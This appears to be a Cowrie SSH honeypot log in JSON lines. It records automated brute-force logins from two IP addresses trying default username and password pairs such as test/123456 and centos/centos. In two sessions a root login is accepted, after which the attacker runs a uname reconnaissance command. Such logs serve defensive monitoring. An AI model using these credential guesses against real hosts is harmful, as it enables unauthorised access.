{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:09.213781Z","src_ip":"212.227.235.229","session":"b05fc2ef3318"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53994,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6492d955aa1","protocol":"ssh","message":"New connection: 212.227.125.160:53994 (1.2.3.4:22) [session: b6492d955aa1]","sensor":"my-vps","timestamp":"2025-08-28T06:50:16.792240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:16.792928Z","src_ip":"212.227.125.160","session":"b6492d955aa1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:17.016093Z","src_ip":"212.227.125.160","session":"b6492d955aa1"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:17.678237Z","src_ip":"212.227.125.160","session":"b6492d955aa1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:18.899346Z","src_ip":"212.227.125.160","session":"b6492d955aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28777,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e257d38878b","protocol":"ssh","message":"New connection: 212.227.235.229:28777 (1.2.3.4:22) [session: 3e257d38878b]","sensor":"my-vps","timestamp":"2025-08-28T06:50:19.973562Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56255,"dst_ip":"1.2.3.4","dst_port":22,"session":"8597b410e404","protocol":"ssh","message":"New connection: 212.227.235.229:56255 (1.2.3.4:22) [session: 8597b410e404]","sensor":"my-vps","timestamp":"2025-08-28T06:50:20.591166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:20.591926Z","src_ip":"212.227.235.229","session":"8597b410e404"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-28T06:50:20.908760Z","src_ip":"212.227.235.229","session":"8597b410e404"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:22.046528Z","src_ip":"212.227.235.229","session":"3e257d38878b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59644,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d24759d160c","protocol":"ssh","message":"New connection: 212.227.235.229:59644 (1.2.3.4:22) [session: 0d24759d160c]","sensor":"my-vps","timestamp":"2025-08-28T06:50:23.328894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:23.329516Z","src_ip":"212.227.235.229","session":"0d24759d160c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:23.582303Z","src_ip":"212.227.235.229","session":"0d24759d160c"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:24.342887Z","src_ip":"212.227.235.229","session":"0d24759d160c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:25.597807Z","src_ip":"212.227.235.229","session":"0d24759d160c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60914,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6bbbbde6de8","protocol":"ssh","message":"New connection: 212.227.125.160:60914 (1.2.3.4:22) [session: f6bbbbde6de8]","sensor":"my-vps","timestamp":"2025-08-28T06:50:33.119052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:33.119932Z","src_ip":"212.227.125.160","session":"f6bbbbde6de8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:34.001403Z","src_ip":"212.227.125.160","session":"f6bbbbde6de8"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:34.666526Z","src_ip":"212.227.125.160","session":"f6bbbbde6de8"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:35.591669Z","src_ip":"212.227.235.229","session":"8597b410e404"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:35.889060Z","src_ip":"212.227.125.160","session":"f6bbbbde6de8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"efec60796345","protocol":"ssh","message":"New connection: 212.227.235.229:57194 (1.2.3.4:22) [session: efec60796345]","sensor":"my-vps","timestamp":"2025-08-28T06:50:39.849336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:39.850531Z","src_ip":"212.227.235.229","session":"efec60796345"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:40.098759Z","src_ip":"212.227.235.229","session":"efec60796345"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:50:41.094618Z","src_ip":"212.227.235.229","session":"efec60796345"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:42.345868Z","src_ip":"212.227.235.229","session":"efec60796345"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46676,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e7cb6726ec","protocol":"ssh","message":"New connection: 212.227.125.160:46676 (1.2.3.4:22) [session: 72e7cb6726ec]","sensor":"my-vps","timestamp":"2025-08-28T06:50:49.781085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:49.827106Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:50.003875Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:50:50.893392Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:50:51.453636Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:50:51.454338Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:51.679375Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:51.680626Z","src_ip":"212.227.125.160","session":"72e7cb6726ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38224,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28eb29309d2","protocol":"ssh","message":"New connection: 212.227.235.229:38224 (1.2.3.4:22) [session: a28eb29309d2]","sensor":"my-vps","timestamp":"2025-08-28T06:50:56.350741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:50:56.351351Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:50:56.597691Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:50:57.632297Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:50:58.232400Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:50:58.233210Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:58.480439Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:50:58.481601Z","src_ip":"212.227.235.229","session":"a28eb29309d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39494,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d118073fa43","protocol":"ssh","message":"New connection: 212.227.125.160:39494 (1.2.3.4:22) [session: 4d118073fa43]","sensor":"my-vps","timestamp":"2025-08-28T06:51:06.102228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:06.104969Z","src_ip":"212.227.125.160","session":"4d118073fa43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:06.318706Z","src_ip":"212.227.125.160","session":"4d118073fa43"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:07.182242Z","src_ip":"212.227.125.160","session":"4d118073fa43"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:08.400306Z","src_ip":"212.227.125.160","session":"4d118073fa43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42282,"dst_ip":"1.2.3.4","dst_port":22,"session":"77fd7fd568a4","protocol":"ssh","message":"New connection: 212.227.235.229:42282 (1.2.3.4:22) [session: 77fd7fd568a4]","sensor":"my-vps","timestamp":"2025-08-28T06:51:12.667400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:12.668370Z","src_ip":"212.227.235.229","session":"77fd7fd568a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:12.928037Z","src_ip":"212.227.235.229","session":"77fd7fd568a4"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:13.709231Z","src_ip":"212.227.235.229","session":"77fd7fd568a4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:14.970859Z","src_ip":"212.227.235.229","session":"77fd7fd568a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54964,"dst_ip":"1.2.3.4","dst_port":22,"session":"196d07753cd0","protocol":"ssh","message":"New connection: 212.227.125.160:54964 (1.2.3.4:22) [session: 196d07753cd0]","sensor":"my-vps","timestamp":"2025-08-28T06:51:22.396847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:22.414866Z","src_ip":"212.227.125.160","session":"196d07753cd0"}
